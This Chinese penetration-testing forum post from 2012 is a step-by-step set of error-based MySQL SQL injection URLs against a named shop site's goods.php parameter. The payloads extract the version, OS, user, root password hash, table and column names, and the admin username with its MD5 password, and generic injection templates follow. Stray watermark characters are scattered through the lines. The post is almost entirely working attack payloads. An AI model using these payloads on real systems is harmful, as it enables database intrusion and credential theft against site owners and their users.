中国网络渗透测试联盟

标题: 盲注详细内容 [打印本页]

作者: admin    时间: 2012-9-5 14:59
标题: 盲注详细内容
判断版本号 ' v4 Y7 A/ G9 |, {7 y, N/ N* p6 p
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%230 W$ I" s4 \, M$ D. y8 {% a

' w* k. P1 b$ h判断系统
4 [. u( Z0 }8 t7 L7 X! C' Q
$ u8 h0 e" L' O" Z4 n$ ^http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
1 x5 Y4 x* R! U! }' B- ]! B* C7 d: f) Y% f, w
" X3 B8 X2 [( N5 H
- p, I5 |3 n  w7 n; Q+ `
当前 user()
9 F; a/ E+ o) E6 D' M6 h0 M- t- J( g- h! o0 e  z4 q1 G  N+ N
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23, ]. r  u% G* j4 _

" m4 R& z- K+ K
$ B/ f4 g+ ~7 a; r  B# x8 j" z
# _% t  b/ e# X当前 database()8 Y$ g% r+ ^" g
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23( c, i1 ~9 H0 Y# S% [; P9 i
/ k# M" n, q7 O7 n: v+ h
2 S( n" H5 d( m& b
" z" S5 X4 b+ C" P# c. i& i2 U
1 E' p8 s9 Q/ z7 J. E; \8 m
root hash
2 V% p2 e* |' }2 }+ O, J
- [2 u, u) M8 \http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
' c6 P& r  a( u% \) T. l6 G+ y3 k8 ?8 R0 D. @4 Y0 P) ?

! C" v, D0 f7 e5 @; n/ ^& J% B/ a$ f2 D* C# P9 e
当前 数据库表名  C& ]; D, e; r

& T) S/ J/ L& p, ~http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
+ l2 b0 ~3 ^5 c; X) ^  _+ u8 H) W8 K$ M; ^5 B; {5 ?, I: w

) ?# S/ r, T/ h
0 Z  `( p- m; Y  v7 f, r当前 数据库 user_name 字段+ L* ^2 {4 x8 m( t7 l% M2 g7 C' R

( F8 h/ ]# @( |; S: d1 @http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
& d! u7 }" @) r8 N  B7 R9 w3 o, B* M  D3 |$ ^  e, P' Z9 ~
当前 数据库 字段 password
. @; \1 F1 I- Q1 m1 n' ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 H: X( K3 p" t$ \. @% ~* D# ?  b; n5 C- |

" J0 j9 o" m/ ~
( @6 {, Z" s. e. g0 l& G+ a% _! N获得 admin passwd(md5)
7 k9 }( u# y  k+ {1 o5 n/ `
6 k2 R* n# z" {) @
6 t6 R8 ~( v$ T( b! ]+ V8 [" Z3 _http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%230 Z( [1 A: ^& z

5 a1 s; y$ u+ o8 d% [8 n1 k8 @6 V9 B2 R$ Y! b报错注射
" `: U, h  p* F- R: j6 xSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
* |8 y' q* W% @/ V9 M% f! m* q4 a6 [  ~8 V) z" ]% U5 U: v, B0 L) v
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)* H3 |! a. `8 ^
/ T: Q" j( C& N) W* F+ N8 x
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2